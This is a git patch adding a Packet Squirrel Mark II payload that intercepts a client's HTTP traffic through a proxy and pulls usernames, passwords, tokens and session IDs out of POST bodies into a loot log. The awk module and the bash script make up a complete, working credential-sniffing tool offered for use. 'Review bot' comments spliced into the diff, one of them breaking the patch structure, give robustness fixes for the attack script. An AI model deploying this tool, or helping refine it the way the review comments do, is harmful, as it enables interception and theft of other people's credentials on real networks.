From 1c86254f9efa82ed4c8d5b7bfdd81f8495945248 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Wed, 3 Dec 2025 07:57:54 -0500
Subject: [PATCH] Capturing Credentials Submitted via HTTP

This payload uses *inotifywait* and *DYNAMICPROXY* to monitor the HTTP POST data streams generated by a client and extract sensitive information using *awk*.
---
 .../capturing-http-credentials/README.md | 22 +++++
 .../modules/login_request.awk | 30 +++++++
 .../capturing-http-credentials/payload | 81 +++++++++++++++++++
 3 files changed, 133 insertions(+)
 create mode 100644 payloads/credentials/capturing-http-credentials/README.md
 create mode 100644 payloads/credentials/capturing-http-credentials/modules/login_request.awk
 create mode 100644 payloads/credentials/capturing-http-credentials/payload

diff --git a/payloads/credentials/capturing-http-credentials/README.md b/payloads/credentials/capturing-http-credentials/README.md
new file mode 100644
index 0000000..fde1cdd
--- /dev/null
+++ b/payloads/credentials/capturing-http-credentials/README.md
@@ -0,0 +1,22 @@
+# Capturing Credentials Submitted via HTTP
+
+- Author: TW-D
+- Version: 1.0
+- Category: Credentials
+- Netmode: NAT
+
+## Prerequisite
+
+Packet Squirrel Mark II
+
+## Description
+
+This payload uses *inotifywait* and *DYNAMICPROXY* to monitor the HTTP POST data streams generated by a client and extract sensitive information using *awk*.
+
+## Configuration
+
+In the **./modules/login_request.awk** file, you can improve the regular expression, contained in the **login_patterns** variable (L3), by adding new HTTP parameters. Additionally, you can add new *AWK* files to the **./modules/** directory; they will be automatically taken into account.
+
+## Usage
+
+The captured credentials will be available in the file **./loots/credentials/.log**.
diff --git a/payloads/credentials/capturing-http-credentials/modules/login_request.awk b/payloads/credentials/capturing-http-credentials/modules/login_request.awk
new file mode 100644
index 0000000..ade0e92
--- /dev/null
+++ b/payloads/credentials/capturing-http-credentials/modules/login_request.awk
@@ -0,0 +1,30 @@
+BEGIN {
+ header_content = ""
+ login_patterns = "(sid=|uid=|user=|pass=|email=|login=|token=|session=|username=|password=)[^&]*"
+}
+
+/POST \// {
+ post_header = 1
+}
+
+post_header == 1 {
+ header_line = $0
+ if (header_line ~ /^[[:space:]]*$/) {
+ post_header = 0
+ post_body = 1
+ next
+ } else {
+ header_content = (header_content != "") ? header_content "\n" : header_content
+ header_content = header_content header_line
+ }
+}
+
+post_body == 1 {
+ body_line = $0
+ if (body_line ~ login_patterns) {
+ print header_content
+ print body_line
+ }
+ post_body = 0
+ header_content = ""
+}
diff --git a/payloads/credentials/capturing-http-credentials/payload b/payloads/credentials/capturing-http-credentials/payload
new file mode 100644
index 0000000..05f77a3
--- /dev/null
+++ b/payloads/credentials/capturing-http-credentials/payload
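Review bot: The module has no header comment stating what it expects as input and what it prints, and `post_header`/`post_body` are used as state flags without being initialised in `BEGIN`, although `header_content` is initialised there. Awk treats an unset variable as 0 in a numeric comparison, so behaviour is unaffected, but for consistency and readability add `post_header = 0` and `post_body = 0` to the `BEGIN` block. A one-line top comment such as `# For each HTTP POST in the stream: collect its header lines, then print them with the first body line if that line matches login_patterns` would also save the next reader from reconstructing the two-flag state machine.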
@@ -0,0 +1,81 @@
+#!/bin/bash
+#
+# Title: Capturing Credentials Submitted via HTTP
+# Description:
+# This payload uses inotifywait and DYNAMICPROXY
+# to monitor the HTTP POST data streams generated
+# by a client and extract sensitive information using awk.
+#
+# Author: TW-D
+# Version: 1.0
+# Category: Credentials
+# Prerequisites:
+# - Packet Squirrel Mark II
+#
+# Netmode: NAT
+#
+# STATUS
+# ================
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Waiting for a button press ...................... OFF
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## CONSTANTS ########
+
+PAYLOAD_SWITCH="/root/payloads/$(SWITCH)"
+readonly PAYLOAD_SWITCH
+
+readonly PAYLOAD_LOOTS="${PAYLOAD_SWITCH}/loots"
+readonly LOOTS_CREDENTIALS="${PAYLOAD_LOOTS}/credentials"
+readonly LOOTS_STREAMS="${PAYLOAD_LOOTS}/streams"
+readonly PAYLOAD_MODULES="${PAYLOAD_SWITCH}/modules"
+
+###########################
+
+set -u
+
+LED SETUP
+
+NETMODE NAT
+
+if [[ ! -d "${PAYLOAD_LOOTS}" ]]; then
+ mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}"
+fi
+
+LED ATTACK
+
+credentials_search() {
+ inotifywait --monitor --format '%w%f' --event close_write "${LOOTS_STREAMS}" | while read -r dynamicproxy_stream; do
+ if [[ -f "${dynamicproxy_stream}" ]]; then
+ case "${dynamicproxy_stream}" in
+ *_CLIENT.stream)
+ for awk_module in "${PAYLOAD_MODULES}"/*.awk; do
+ awk -f "${awk_module}" "${dynamicproxy_stream}"
+ done
+ ;;
+ esac
+ rm "${dynamicproxy_stream}"
+ fi
+ done
+}
+credentials_search &> "${LOOTS_CREDENTIALS}/$(date +%s).log" &
+cs_pid="${!}"
+
+DYNAMICPROXY CLIENT "${LOOTS_STREAMS}/http_" 80 &
+dp_pid="${!}"
+
+LED OFF
+
+NO_LED=1 BUTTON
+
+LED CLEANUP
+
+kill "${dp_pid}" "${cs_pid}"
+sync
+
+LED FINISH
+
+poweroff
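Review bot: The guard around `mkdir -p` only tests `${PAYLOAD_LOOTS}`, so if that directory survives from an earlier run but `credentials/` or `streams/` does not, neither subdirectory is created and the redirection into `${LOOTS_CREDENTIALS}` and the `inotifywait` watch on `${LOOTS_STREAMS}` fail silently, since the script runs under `set -u` alone with no `set -e` and no status check. `mkdir -p` is idempotent, so the `if` can be dropped in favour of `mkdir -p "${LOOTS_CREDENTIALS}" "${LOOTS_STREAMS}" || exit 1`. Separately, `kill "${dp_pid}" "${cs_pid}"` signals only the backgrounded subshell; `inotifywait --monitor` and the `while` loop are its pipeline children and are not necessarily terminated before `sync`, which is masked here only because `poweroff` follows. If the device's `pkill` supports `-P`, a `pkill -P "${cs_pid}"` before the `kill` would reap them explicitly.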